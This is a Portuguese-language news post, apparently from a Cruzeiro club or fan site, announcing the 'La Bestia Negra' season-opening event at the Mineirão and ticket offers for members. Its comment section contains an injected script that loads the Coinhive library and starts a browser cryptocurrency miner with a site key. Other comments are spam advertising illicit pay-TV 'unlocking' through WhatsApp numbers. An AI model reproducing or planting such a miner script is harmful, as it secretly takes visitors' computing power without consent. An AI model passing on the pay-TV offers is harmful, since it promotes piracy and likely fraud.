logo

15/1/2018 11:38

La Bestia Negra: evento especial marcará jogo de estreia na temporada

La Bestia Negra: evento especial marcará jogo de estreia na temporada

Foto: Cristiane Mattos / Light Press / Cruzeiro

Da Sede Administrativa

Lucas Leite

Após mais de um mês longe dos gramados, o Cruzeiro volta a encontrar sua imensa e apaixonada Nação Azul no Gigante da Pampulha na próxima semana, quando enfrentará o Tupi, pelo Campeonato Mineiro. E justamente o Mineirão, local de vários triunfos do Time do Povo, será o palco, na noite de 17 de janeiro, do evento especial "La Bestia Negra", preparado pelo Clube para celebrar a estreia na temporada e que envolverá desde shows e food trucks na Esplanada Sul até a apresentação oficial de todo o elenco que vestirá o manto cinco estrelas em 2018.



Será a oportunidade da maior torcida de Minas Gerais comparecer ao primeiro compromisso no ano e apoiar os comandados do técnico Mano Menezes, que teve seu elenco reforçado com grandes atletas para que a Raposa possa continuar a escrever mais capítulos vitoriosos no livro que já é repleto de inúmeras conquistas.

Para dar início às ações, o cruzeirense fará a festa no "Aquece Mineirão". Das 18h45 às 21h, o torcedor poderá conferir um show de Marcelinho Rodrigues, que cantará sucessos do sertanejo universitário e clássicos do gênero e aproveitar de food trucks e bares. As cheerleaders e o Raposão, mascote oficial do Pentacampeão da Copa do Brasil, também marcarão presença. As ações serão promovidas na Esplanada Sul do estádio e contarão com apoio do Mineirão e da 98FM.

Com o encerramento do Aquece Mineirão, o apaixonado pelo Cruzeiro já poderá acessar o interior do Gigante da Pampulha e acompanhar a apresentação oficial de todo o elenco da Raposa para 2018. A iniciativa está marcada para às 21h30, momentos antes do início do jogo contra o Tupi.

Esplanada Sul receberá o "Aquece Mineirão". Foto: Janu Vieira / Cruzeiro

Ingressos para a partida:

Apoio fundamental nos jogos no Gigante da Pampulha, o Sócio do Futebol terá uma promoção especial para não ficar de fora do duelo. Todos os cruzeirenses adeptos das categorias Cativas (Tríplice Coroa, Libertadores, Brasileiro e Copa do Brasil) e das modalidades Cruzeiro Sempre, Papafilas e Time do Povo terão direito de adquirir um ingresso extra.

Mas além do bilhete adicional, a grande novidade será que cada Sócio poderá, após efetuar a compra de pelo menos uma entrada, resgatar mais dois ingressos através do programa de pontos “Cruzeiros”.

Os ingressos para os Sócios do Futebol custam a partir de R$ 10 e serão vendidos no site e aplicativo do programa. A comercialização nas bilheterias começa na segunda-feira (15), no Ginásio do Barro Preto e no Mineirão.

Veja mais informações sobre a venda de ingressos: Cruzeiro x Tupi

Foto: Washington Alves / Light Press / Cruzeiro

471 visitas - Fonte: Site Oficial


a gente ouve é v comentários do cruzeiro em almenta o número de sócio torcedor,mas na onde eles vam coloca esse povo pra assistir os jogos será na tv? pois no campo não tem lugar para colocar tanta gente,!

Rafael Pontes     

legal < src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Você que está pagado valores alto e teno pouco PROGRAMAÇÃO de TVV asssinatura faça liberação e DEMINUIMOS valor da conta pra qualquer luga do Brasil WHATZSAP 11958640776

tiago silva     

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui.

Próximo Jogo - Campeonato Mineiro

S&# - 16:30 - Mineirão - PPV
Cruzeiro
Boa Esporte

Último jogo - Campeonato Mineiro

S&# - 16:30 - Mineião
Cruzeiro
1 0
Vila Nova

Classificação